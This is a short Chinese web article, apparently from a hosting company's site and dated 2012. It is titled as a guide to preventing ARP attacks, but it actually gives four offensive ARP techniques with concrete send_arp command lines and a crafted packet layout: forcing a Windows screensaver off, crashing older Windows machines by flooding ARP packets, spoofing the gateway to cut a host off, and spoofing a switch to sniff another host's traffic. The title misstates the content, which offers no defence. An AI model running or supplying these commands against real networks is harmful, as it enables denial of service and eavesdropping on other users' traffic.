ARP攻击的一般防治方法 |
发布时间: 2012/8/2 18:07:41 |
一个要攻击的机子:10.5.4.178 硬件地址:52:54:4C:98:EE:2F 我的机子: :10.5.3.69 硬件地址:52:54:4C:98:ED:C5 网关: 10.5.0.3 硬件地址:00:90:26:3D:0C:F3 一台交换机另一端口的机子:10.5.3.3 硬件地址:52:54:4C:98:ED:F7 一:用ARP破WINDOWS的屏保 原理:利用IP冲突的级别比屏保高,当有冲突时,就会跳出屏保。 关键:ARP包的数量适当。 [root@sztcww tools]# ./send_arp 10.5.4.178 00:90:26:3D:0C:F3 \ 10.5.4.178 52:54:4C:98:EE:2F 40 二:用ARP导致IP冲突,死机 原理:WINDOWS 9X,NT4在处理IP冲突时,处理不过来,导致死机。 注:对WINDOWS 2K,LINUX相当于flooding,只是比一般的FLOODING 有效的多.对LINUX,明显系统被拖慢。 [root@sztcww tools]# ./send_arp 10.5.4.178 00:90:26:3D:0C:F3 \ 10.5.4.178 52:54:4C:98:EE:2F 999999999 三:用ARP欺骗网关,可导致局域网的某台机子出不了网关。 原理:用ARP应答包去刷新对应着要使之出不去的机子。 [root@sztcww tools]# ./send_arp 10.5.4.178 52:54:4C:98:EE:22 \ 10.5.4.178 00:90:26:3D:0C:F3 1 注意:如果单单如上的命令,大概只能有效几秒钟,网关机子里的ARP高速缓存会被被攻击的机子正确刷新,于是只要... 四:用ARP欺骗交换机,可监听到交换机另一端的机子。 可能需要修改一下send_arp.c,构造如下的数据包。 ethhdr srchw:52:54:4C:98:ED:F7--->dsthw:FF:FF:FF:FF:FF:FF proto:806H arphdr hwtype:1 protol:800H hw_size:6 pro_size:4 op:1 s_ha:52:54:4C:98:ED:F7 s_ip:10.5.3.3 d_ha:00:00:00:00:00:00 d_ip:10.5.3.3 然后就可以sniffer了。 原理: 交换机是具有记忆MAC地址功能的,它维护一张MAC地址和它的口号表 所以你可以先来个ARP 欺骗,然后就可以监听了 不过需要指出,欺骗以后,同一个MAC地址就有两个端口号 yuange说,“这样其实就是一个竞争问题。” 好象ARP 以后,对整个网络会有点影响,不过我不敢确定 既然是竞争,所以监听也只能监听一部分,不象同一HUB下的监听。 对被监听者会有影响,因为他掉了一部分数据。 当然还有其他一些应用,需要其他技术的配合。 本文出自:亿恩科技【www.enkj.com】 |